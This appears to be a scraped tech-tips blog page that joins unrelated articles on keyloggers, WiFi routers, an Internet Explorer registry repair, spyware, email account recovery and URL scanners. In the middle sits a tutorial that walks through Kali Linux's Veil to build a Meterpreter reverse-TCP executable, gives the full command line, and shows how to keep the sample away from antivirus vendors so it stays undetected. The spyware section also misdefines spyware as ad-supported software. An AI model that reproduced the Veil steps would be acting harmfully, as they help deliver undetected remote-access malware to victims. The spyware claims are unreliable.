Beware of the Keyloggers, Ensure about your Data Privacy now!

I am sure that you would have heard about keylogger. Many of you might be of the notion that keylogger is a software, but this is not so. Keylogger could be hardware or software. It is meant for both legitimate and illegitimate jobs, but most of the times, it is used by the bad guys to spy on other's information.

If you do not want anybody to have an illicit access to your information, you need to know to catch hold of this kind of process that might run in your system without your knowledge. Here is how, you can have a check on this process.

Hardware keylogger:

Hardware keylogger is the device that needs to be connected to the keyboard port. If you happen to locate it, you can have it disconnected, so that the keystrokes are not traced.

An alternate method of having the hardware keylogger installed is by soldering it into the circuit of the keyboard. To make sure that you do not have it soldered into the keyboard, you need to disassemble the board and find if there is any such thing fixed.

Software keylogger:
There are innumerous Software keyloggers that can be found online. Certain virus or malware programs have the ability to install keyloggers in your computer while running in your system. Most often, the keyloggers are used to have the credentials of important accounts, such as bank, social media, etc.

There are few things that you can do to identify a software keylogger and here they are!

Download our Android App Best Computer Guide

1) Run an antivirus program
You can run an antivirus program to find, if there is any keylogger installed in your system. You can land on the computer review sites to find which product is the suitable one to detect a software keylogger.

2) Get rid of the malicious files
Run your antivirus and anti-spyware programs almost daily, so that these programs protect you from the malware that is capable of running and sliding keylogger into your system. Make sure that the detected malicious files are either quarantined or removed from the system.

3) Update antivirus software regularly
We would suggest you to schedule updates for your antivirus program on a daily basis. If the virus definitions are open to updates more often, then there is less chance that your computer will be attacked by the trouble making malicious files.

Hardware keyloggers are easy to find when compared with the software keylogger. However, you can make use of updated antivirus or anti-spyware to get rid of it.

7 Tips To Get More Out Of Your WiFi Router

Wireless routers are a bit like relationships. You don't notice the problems until things go really wrong and they send you crazy. This behaviour is normally accompanied by naming calling and huge sighs! And at times, you can't understand what has gone wrong – but you blame the router anyway!

However, sometimes is not the routers fault – it is yours. It's about time you accepted the blame and fix things pronto!

1. Did you read the manual?

Remember all the times you wished your other half came with instructions? Yet you expect your router to perform miracles automatically! In your defense, we’ve all done it, but just like your partners, routers are all different and need a little TLC. A quick read of the instructions will make sure you treat it right! If you didn't get a manual with your router you can download users guides from the supplier’s website.

2. You didn’t learn the basics

You will be amazed how much better you get on with your wireless router if you have a basic understanding of its needs. This all may sound very complicated and techy, but the truth is its child´s play.

3. You never change

It´s easy to get stuck in your ways, but you have to keep things fresh. Keep your router up to date, your ISP will often allow you to upgrade to a new model for free if it becomes their standard issue for new customers, additionally firmware updates from the manufacturer can help find and fix any bugs and generally improve the performance of your device.

4. You’re using the wrong technology for your needs

You might want to consider exactly what you need from your service and if your expectations are reasonable. Are you a seriously competitive online gamer? Chances are you should be connecting to your router with a wired Ethernet connection. Always on the move for business but need to stay plugged into the web? You’re going to need a service specifically for international wireless roaming. Take some time to think about what you actually need from your service before committing to a plan.

5. You’re embarrassed to be seen with it

Wireless routers are not the sexiest device you will ever own, but its what´s on the inside that counts! And tucking your box in the corner out of the way may not be the best place to keep it. Ideally, it needs to be in range of all devices you use it for, and preferably an open space where it can breathe.

6. Something is interfering

This problem is more common than you realize. Routers work from a 2.4 GHz band – the same as many other household devices such as cordless phone, microwave and baby monitors. It could be that they are interfering with your router and affecting its performance.

7. Interfering neighbors

One of the most common interference patterns for routers comes from next door. The chances are your neighbors connect over the same frequency as you and just like your own household devices. Might be sharing the same 2.4 GHz frequency as you.

Naturally, if you live in a densely populated area, you could have any number of rivals competing for space on this limited band. The only real solution for now is getting a router that operates on dual bands simultaneously. Newer routers will often run on 2.4 GHz and 5 GHz bands at the same time, allowing the latest WiFi devices to connect on the much less congested 5 GHz band. Of course the other thing to consider is that your neighbors may be intentionally reducing your bandwidth by hogging it for themselves!

Broken IE: How to fix it?

So one of your friends, “not you of course”, has managed to nuke Internet Explorer and they are unsure how they did it. You’ve eliminated the possibility of viruses and adware, so this just leaves you and a broken IE. Before you begin to even consider running a repair install of the OS, let’s try to do a repair on IE instead.

THE REPAIR PROCESS

Start the Registry Editor by typing regedit from the Run box. Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Active Setup \ Installed Components \ {89820200-ECBD-11cf-8B85-00AA005B4383} and then right-click the “IsInstalled value.” Click Modify. From there, you will change the value from 1 to 0. All right, go ahead and close the editor and reinstall IE from this location. /http://www.microsoft.com/windows/ie/default.mspx

IF SOMETHING GOES WRONG

If messing with the registry and something goes horribly wrong, you can use “Last Known Good Configuration (F8 Safe Mode)” or a Restore Point to get back to where you were before, with your settings. Then you can try again, this time taking care to watch the portion of the registry you are changing. Most people who have troubles with this end up changing the wrong registry key.

Hope this tut helps some members.

All about Spyware: Everything you need to know

There are a lot of PC users that know little about "Spyware", "Mal-ware", "hijackers", "Dialers" & many more. This will help you avoid pop-ups, spammers and all those baddies.

What is spy-ware?

Image result for spyware

Spy-ware is Internet jargon for Advertising Supported software (Ad-ware). It is a way for shareware authors to make money from a product, other than by selling it to the users. There are several large media companies that offer them to place banner ads in their products in exchange for a portion of the revenue from banner sales. This way, you don't have to pay for the software and the developers are still getting paid. If you find the banners annoying, there is usually an option to remove them, by paying the regular licensing fee.

Known spywares
There are thousands out there, new ones are added to the list everyday. But here are a few:
Alexa, Aureate/Radiate, BargainBuddy, ClickTillUWin, Conducent Timesink, Cydoor, Comet Cursor, eZula/KaZaa Toptext, Flashpoint/Flashtrack, Flyswat, Gator, GoHip, Hotbar, ISTbar, Lions Pride Enterprises/Blazing Logic/Trek Blue, Lop (C2Media), Mattel Brodcast, Morpheus, NewDotNet, Realplayer, Songspy, Xupiter, Web3000, WebHancer, Windows Messenger Service.

How to bypass an Antivirus using Kali Linux Tool VELI

Veil is a awesome tool developed by Chris Truncer @ChrisTruncer, Mike Wright @TheMightyShivand The Grayhound @the_grayhound specifically designed for Kali Linux which has the goal of:

  • Bypass common AV solutions used.
  • Get the payloads from Metasploit framework, and get the new ones in the future Metasploit releases.
  • Try to create each payload as random as possible.

Some days ago Veil v2.0.4 was Released. I’m want to talk about it and give some examples about how to bypass severals anti-virus.

The main changes in this version is:

  • x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
  • Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.

Download our Android App Best Computer Guide

There are tutorials available at http://www.veil-evasion.com The framework can be downloaded from Chris’ github at https://github.com/ChrisTruncer/Veil/ or athttps://github.com/ChrisTruncer/Veil/archive/master.zip.

If you want to install Veil in your own environment you can use the commands below:

2. unzip master.zip

3. cd Veil-master/setup

4. cd ..

5. ./setup.sh

If you want to work with Kali Linux, with the commands below it will be enough.
1. apt-get update
2. apt-get install veil

I had a bad experience with the second option and I prefer to install Veil with the first one using “setup.sh” script.

The veil’s developers don’t want to submit any payload to www.virustotal.com to avoid distribution to the anti-virus vendors. There are an alternative: vscan.novirusthanks.org. That site scan the suspicious files for malware detection and offer us the option below: “Do not distribute the sample”.

When Veil is recently installed, just run it with the command below:
1.  ./Veil

By default in Kali Linux, we can see 18 payloads ready to be used. Now we can type “use“.

Here, Veil offers us more information about the payloads. In this case I chose python/b64VirtualAlloc typing “18”

When our payload is loaded type “generate“. You can set some specifics options, but in this post, we are going to try the default options.

Now we are going to select msfvenom typing “1”

After that we need to type some details:
Enter metasploit payload: “windows/meterpreter/reverse_tcp“

Enter value for ‘LHOST’, [tab] for local IP: “168.69.69“
Enter value for ‘LPORT’: “443

Then it’s necessary to wait while the shellcode is been generated.

You need to press enter and then Veil requests us the name of our payload. In this case “undetectable

We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type “1

In the end, we can get our executable at “/root/Veil-master/output/compiled/

Now, we have our executable and we are going to submit it to vscan.novirusthanks.org. Please, remember to check “Do not distribute the sample”. If you choose to don’t check this options or you decide to submit the executable to www.virustotal.com your file will be investigated and maybe it will be recognized by some anti-virus vendors.

You can see in the picture below any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of 0%!!!!

If you prefer to use the CLI instead of a menu, you can generate the same payload we have just created with the command below.
1 ./Veil.py -l python -p b64VirtualAlloc -o undetectable –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=192.168.69.69 LPORT=443

What to do when your E-Mail Account is Hacked

It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out by suggesting some of the steps that you need to take as soon as you realize that your email account is hacked.

Here is a list of steps and procedures that you need to follow in order to initiate the Password Recovery Process:

Steps to Recover Gmail Password:

It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut, etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try:

Step-1: Try resetting your password! This is the first step and probably the easiest way to get your account back in action. In this process, Google may ask you to answer the Secret Question or may send the password reset details to the Secondary Email Address associated with your compromised account. You can reset you password from the following link

Gmail Password Reset Link

Gmail has also a feature wherein it is possible to reset your password using your mobile number. Once the reset process is initiated, Gmail will send new login details to your mobile number itself.

If you cannot find success from the Step-1, then proceed to Step-2.

Step-2: Many times the hacker will change the secret question and the secondary email address right after the account is compromised. This is the reason for the password reset process to fail. If this is the case, then you need to contact the Gmail support team by filling out the account recovery form. This form will ask you to fill out several questions like:

  • Email addresses of up to five frequently emailed contacts
  • Names of any 4 Labels that you may have created in your account
  • List of other services associated with your compromised account
  • Your last successful login date
  • Account created date
  • Last password that you remember and many more…

You need to fill out this form as much accurately as possible. It is obvious to forget the dates of last login, account creation and similar terms. However, you need to figure out the closest possible date/answers and fill out this form. This is your last chance!

The more accurate the information filled out in the recovery form, the more the chances of getting your account back. You may reach the account recovery page form the following link

Account Recovery Form

Steps to Recover Yahoo and Hotmail Password:

Unfortunately, for Yahoo/Hotmail there is no second option like filling out the form or contacting the support team. All you need to do is either answer the Secret Questions that you have setup or reset the password using the Secondary Email Option.

To initiate the Password Reset process just click on the Forgot password link in your login page and proceed as per the Screen Instructions.

I hope this post will help you recover access to your compromised Email Account.

How to Check if Website is Malicious using Online URL Scanners

A computer doesn’t just get infected with malware by itself and it has to come from somewhere. It can be from a medium such as an infected USB flash drive, or an infected file that is downloaded from a website, and also from attachments in emails. The person who created the malware normally wants to infect as many computers as possible turning them into slaves that can be used to perform other actions such as launching a DDoS attack, mining Bitcoin and etc.

One fast method of spreading malware is by hacking a popular website to gain administrative access and injecting exploits or malware that is easily downloaded onto the visitor’s computer. Instead of the hacker using a lot of Internet bandwidth and processing power to push the malware to thousands of people, this method is much less tedious because the hacker just sits and waits for the visitors to get infected when they visit the popular website that is hacked.

Although an antivirus software plays an important part to ensure that any file downloaded from the Internet is scanned, scanning the URL before hand adds another layer of defense. Most antivirus software has a link scanner but if for some reason you prefer not to enable it, here are 5 external URL scanners that can use to manually check if the website is clean from malware or exploits.

1. VirusTotal

Not only can you upload any file to have it scanned with 55 different antivirus, VirusTotal also has the ability to scan any URL using 63 different link scanning services. All you need to do is type the URL in the box and click the “Scan it!” button.

It may surprise you that the link scanning is very fast taking only a few seconds to complete scanning a URL with over 60 different services. This is not due to VirusTotal servers hosted under Google’s powerful infrastructure but it is because VirusTotal merely pulls the latest scan report out of each URL scanning service. So it is not necessary that each of the link scanning services available at VirusTotal are giving the most current scan results during the time of request.

2. URLVoid

URLVoid is another link scanning service by an Italian company NoVirusThanks that is similar to VirusTotal. Simply enter the domain name in the box and click the Submit Now button to receive the status of the hyperlink. Additional information such as when the domain was first registered, server location, Google Pagerank and Alexa Traffic Rank is accompanied together with the scan results.

Although URLVoid only supports up to 29 URL scanning engines, what we like about this service is the ability to conveniently access the official and more detailed report from the individual scanning engine website by clicking on the “View more details” link.

3. Sucuri

Sucuri is a well known company that offers services to protect websites against malware and DDoS attack while also offering services to clean up hacked sites. Sucuri has a free and remote scanner called SiteCheck to detect if there’s any injected malware, errors, blacklists and even outdated software on the website.

Unlike VirusTotal and URLVoid that use third party scanning results, Sucuri uses their own propriety method that specializes in detecting malware in the form of embedded Javascript and showing you the location of the payload. The results are cached for 24 hours and there is a link at the bottom to force a rescan to clear the cache.

4. Is It Hacked?

A hacked website can contain a malicious payload and it makes sense to check if a website has signs of being hacked so you can avoid visiting the dangerous website. Is It Hacked? uses a different approach which is to check if there is any cloaking which means a different web page is served to users and GoogleBot. This is to delay the hacked website containing malicious code being detected by Google SafeBrowsing.

It also looks for spammy looking links which are normally found on shady websites that have nothing great to offer to visitors, iframes which are normally used to inject payloads and finally perform blacklist checks from 3 well known sources (Google Safe Browsing, PhishTank, McAfee SiteAdvisor).

5. Web Inspector

Web Inspector is included in VirusTotal but the actual online scanner service reveals much more information about a scanned URL. The report page shows if the scanned URL is clean, suspicious or high risk with up to 7 days of scan history, checks the issuer and expiry date of SSL, and also checks up to 12 different categories of online threats ranging from the common blacklist checking to the dynamic heuristic virus detection.

Web Inspector is created by the same company that produces the popular Comodo Internet Security. Our only gripe on Web Inspector is it takes quite a while to complete scanning a URL.
